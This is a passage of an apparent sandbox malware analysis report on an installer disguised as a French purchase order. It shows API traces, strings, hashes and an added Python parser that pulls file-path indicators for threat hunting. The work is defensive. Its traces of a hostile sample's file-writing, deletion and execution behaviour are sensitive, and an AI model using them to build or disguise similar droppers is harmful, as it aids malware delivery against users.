                                                        • Instruction Fuzzy Hash: EA417D71A00209BFCB00EFA4CE88E9E7BB5BF48354B2042A9F911FB2D0D6799D41DB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
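The function blocks in this part of the report are a raw export: one API trace per function, then its strings, the memory-dump provenance and the opcode/instruction fuzzy hashes. Working through hundreds of them by eye is slow, and what an analyst actually wants out of them is structured: which block calls what, and which file paths appear in arguments or strings (here the Temp-directory cleanup and the `salpetersyrefabrikkers\occupying\Nonsynoptic168\...` path). The parser below is an added example written for this page; it is not Joe Sandbox code and is not part of the report. It assumes the sandbox profile is `C:\Users\user` (as the paths above show) and rewrites that prefix to an environment-relative form for hunting, treats the `Download File` text fused onto the `.sdmp` names as link residue and strips it, and splits API arguments on commas exactly as the report prints them, so an argument that itself contained a comma would be split. `SAMPLE` is constructed from lines of the blocks above (the `Part of subcall function` line is taken from the SHBrowseForFolderA block).

```python
"""Parse Joe Sandbox function-block text (the APIs / Strings / Memory Dump Source /
Similarity / Uniqueness sections) and pull out path IOCs. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API line: optional 'Part of subcall function XXXXXXXX: ' prefix, then
# Name.MODULE(args), ref: XXXXXXXX. Arguments are split on commas as the report prints them.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^(?P<value>.*), xrefs: (?P<xref>[0-9A-F]{8})$")
PATH_RE = re.compile(r'[A-Za-z]:\\[^,()"]+')   # absolute Windows paths inside args/strings
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}
# Assumption: the sandbox profile is C:\Users\user; rewrite it to an env-relative form.
PREFIX_MAP = [("C:\\Users\\user\\AppData\\Local\\Temp\\", "%TEMP%\\"),
              ("C:\\Users\\user\\AppData\\Local\\", "%LOCALAPPDATA%\\"),
              ("C:\\Users\\user\\", "%USERPROFILE%\\")]


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None   # set for 'Part of subcall function' entries


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (value, xref)
    meta: dict = field(default_factory=dict)     # 'Associated', 'API ID', 'Uniqueness Score', ...


# Constructed sample: lines copied from the report's function blocks.
SAMPLE = r"""
APIs
• DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 004055C7
• lstrcatA.KERNEL32(00420CE8,\*.*,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 0040560F
  • Part of subcall function 004054D6: GetDlgItemTextA.USER32(?,?,00000400,004045C6), ref: 004054E9
Strings
• "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe", xrefs: 0040559E
• \*.*, xrefs: 00405609
Memory Dump Source
• Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
Uniqueness
Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
Strings
• C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine, xrefs: 004020CB
"""


def parse_blocks(text):
    """Split report text into FunctionBlocks; a new block starts at each 'APIs' header."""
    blocks, block, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                block = FunctionBlock()
                blocks.append(block)
            section = line
            continue
        if block is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                block.apis.append(ApiCall(m["name"], m["module"],
                                          m["args"].split(","), m["ref"], m["sub"]))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                block.strings.append((m["value"], m["xref"]))
        else:  # 'key: value' fields; drop the 'Download File' link text fused onto .sdmp names
            key, _, value = line.partition(": ")
            block.meta.setdefault(key, []).append(value.removesuffix("Download File").strip())
    return blocks


def normalize_path(path):
    for prefix, env in PREFIX_MAP:
        if path.lower().startswith(prefix.lower()):
            return env + path[len(prefix):]
    return path


def extract_path_iocs(blocks):
    """Unique absolute paths seen in API arguments or strings, env-normalized and sorted."""
    texts = [a for b in blocks for c in b.apis for a in c.args]
    texts += [v for b in blocks for v, _ in b.strings]
    return sorted({normalize_path(p) for t in texts for p in PATH_RE.findall(t)})


def api_sequence(block):
    """Ordered top-level calls (subcall entries excluded), as Name.MODULE."""
    return [f"{c.name}.{c.module}" for c in block.apis if c.subcall_of is None]


def find_calls(blocks, api_name):
    """(block index, ref, args) for every call to api_name across all blocks."""
    return [(i, c.ref, c.args) for i, b in enumerate(blocks)
            for c in b.apis if c.name == api_name]
```

`extract_path_iocs(parse_blocks(SAMPLE))` returns three env-relative paths; the `%LOCALAPPDATA%\salpetersyrefabrikkers\...` entry is the one worth searching for on other hosts, while `%TEMP%\` and the Desktop path only reflect where the sandbox placed the sample. `find_calls(blocks, "ShellExecuteA")` or `find_calls(blocks, "CoCreateInstance")` locates the block and `ref` address to open in the dump.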

                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: a8fb8b9bc022ec85cc7451553b5f9f232c4783b0165688009c132a284a7473d9
                                                        • Instruction ID: db1172372b73d17c9e5c842b05e6fc1add0f007f89b28e5155f99bf94e6db886
                                                        • Opcode Fuzzy Hash: a8fb8b9bc022ec85cc7451553b5f9f232c4783b0165688009c132a284a7473d9
                                                        • Instruction Fuzzy Hash: 63F0A772508114ABE700E7749949AEE7768DF51314F60457BE141F60C1D3B84941DB2A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041A0
                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 004041B4
                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041D2
                                                        • GetSysColor.USER32(?), ref: 004041E3
                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041F2
                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404201
                                                        • lstrlenA.KERNEL32(?), ref: 00404204
                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404213
                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404228
                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040428A
                                                        • SendMessageA.USER32(00000000), ref: 0040428D
                                                        • GetDlgItem.USER32(?,000003E8), ref: 004042B8
                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042F8
                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00404307
                                                        • SetCursor.USER32(00000000), ref: 00404310
                                                        • ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,00000001), ref: 00404323
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00404330
                                                        • SetCursor.USER32(00000000), ref: 00404333
                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040435F
                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404373
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                        • String ID: .>e$: Completed$N$open$@@
                                                        • API String ID: 3615053054-4261444726
                                                        • Opcode ID: 968b0e608722a5a4807cbf1cbf6d651574c4be42df1e23b0a274a5bf77e584f7
                                                        • Instruction ID: 7e55316eb6edc40c7699564df6a93aee63aedbce2365efaa8751590eb61f664c
                                                        • Opcode Fuzzy Hash: 968b0e608722a5a4807cbf1cbf6d651574c4be42df1e23b0a274a5bf77e584f7
                                                        • Instruction Fuzzy Hash: C561A2B1A40305BFEB109F61CC45F6A7B69FB84715F10802AFA05BA2D1C7B8A951CF99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextA.USER32(00000000,Stedtillgs Setup,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F$Stedtillgs Setup
                                                        • API String ID: 941294808-2053236795
                                                        • Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                        • Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
                                                        • Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                        • Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrcpyA.KERNEL32(00421A70,NUL,?,00000000,?,00000000,?,00405BBA,?,?,00000001,0040575D,?,00000000,000000F1,?), ref: 00405A26
                                                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BBA,?,?,00000001,0040575D,?,00000000,000000F1,?), ref: 00405A4A
                                                        • GetShortPathNameA.KERNEL32(00000000,00421A70,00000400), ref: 00405A53
                                                          • Part of subcall function 004058D4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 004058E4
                                                          • Part of subcall function 004058D4: lstrlenA.KERNEL32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 00405916
                                                        • GetShortPathNameA.KERNEL32(?,00421E70,00000400), ref: 00405A70
                                                        • wsprintfA.USER32 ref: 00405A8E
                                                        • GetFileSize.KERNEL32(00000000,00000000,00421E70,C0000000,00000004,00421E70,?,?,?,?,?), ref: 00405AC9
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405AD8
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B10
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421670,00000000,-0000000A,00409384,00000000,[Rename],00000000,00000000,00000000), ref: 00405B66
                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B78
                                                        • GlobalFree.KERNEL32(00000000), ref: 00405B7F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00405B86
                                                          • Part of subcall function 0040596F: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 00405973
                                                          • Part of subcall function 0040596F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                        • String ID: %s=%s$NUL$[Rename]
                                                        • API String ID: 1265525490-4148678300
                                                        • Opcode ID: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
                                                        • Instruction ID: 2a91906f743b427df7c641563761ed76cd06f16afc5903481ab5df03799b8c64
                                                        • Opcode Fuzzy Hash: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
                                                        • Instruction Fuzzy Hash: ED41CFB1604B15BFD2206B615C49F6B3A6CDB45764F14013AFD05B62D2EA7CBC018E7D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FA1
                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FB3
                                                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FC3
                                                        Strings
                                                        • "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe", xrefs: 00405F85
                                                        • *?|<>/":, xrefs: 00405F91
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F4A, 00405F4F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-1911095825
                                                        • Opcode ID: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                        • Instruction ID: 52ce86beafc523711f1768644b20335aaf79eeea50abe94daadfaeac939761d3
                                                        • Opcode Fuzzy Hash: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                        • Instruction Fuzzy Hash: C811C851808B97A9F73206340C44B77BF99CB5B760F18047BE9C4722C2D67C5C42DA6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00404050
                                                        • GetSysColor.USER32(00000000), ref: 0040406C
                                                        • SetTextColor.GDI32(?,00000000), ref: 00404078
                                                        • SetBkMode.GDI32(?,?), ref: 00404084
                                                        • GetSysColor.USER32(?), ref: 00404097
                                                        • SetBkColor.GDI32(?,?), ref: 004040A7
                                                        • DeleteObject.GDI32(?), ref: 004040C1
                                                        • CreateBrushIndirect.GDI32(?), ref: 004040CB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                        • Instruction ID: 9508cbdce8052bc2bd730cf0eefd2a198c0b18875b65dcd903ac07b372545bec
                                                        • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                        • Instruction Fuzzy Hash: 482184B19047449BCB319F78DD08B5BBBF8AF41714F048A29EA96F22E1C738E944CB55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                                        • GlobalFree.KERNEL32(?), ref: 0040272C
                                                        • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                        • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                        • String ID:
                                                        • API String ID: 3294113728-0
                                                        • Opcode ID: 46cbf8bf85c08fe0c845a6a349b34ee7b1a6b64c425fa626d610c4ed04b7097c
                                                        • Instruction ID: 503fd3c95f490675627f5e02168e5e633d1b488668870af047a7021cc1d79fd2
                                                        • Opcode Fuzzy Hash: 46cbf8bf85c08fe0c845a6a349b34ee7b1a6b64c425fa626d610c4ed04b7097c
                                                        • Instruction Fuzzy Hash: BF318B71C00128BBCF216FA5CD89DAE7E79EF09364F10423AF524772E1C6795D419BA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetWindowTextA.USER32(00000000,Stedtillgs Setup), ref: 00403AC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: TextWindow
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$.>e$1033$Stedtillgs Setup$Stedtillgs Setup: Completed
                                                        • API String ID: 530164218-3337983272
                                                        • Opcode ID: 7da43f0c514d78443db1c9c9eeb4ba8c9d941e0bb92036ebee77233e000656fa
                                                        • Instruction ID: f1b991f97094af788ebc2fc7f50f41b17603f103b5ffb0c1ba3ee096011c9b45
                                                        • Opcode Fuzzy Hash: 7da43f0c514d78443db1c9c9eeb4ba8c9d941e0bb92036ebee77233e000656fa
                                                        • Instruction Fuzzy Hash: DE11D1B1B04611ABCB20DF55DC80A377BADEB84716369813FE941A7391C63D9D029EA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                                                        • GetTickCount.KERNEL32 ref: 00402C10
                                                        • wsprintfA.USER32 ref: 00402C3E
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                          • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Completed,00402C51,00402C51,Completed,00000000,00000000,00000000), ref: 00405025
                                                          • Part of subcall function 00404FC9: SetWindowTextA.USER32(Completed,Completed), ref: 00405037
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                                          • Part of subcall function 00402BBE: MulDiv.KERNEL32(000063F4,00000064,000084F9), ref: 00402BD3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 722711167-2449383134
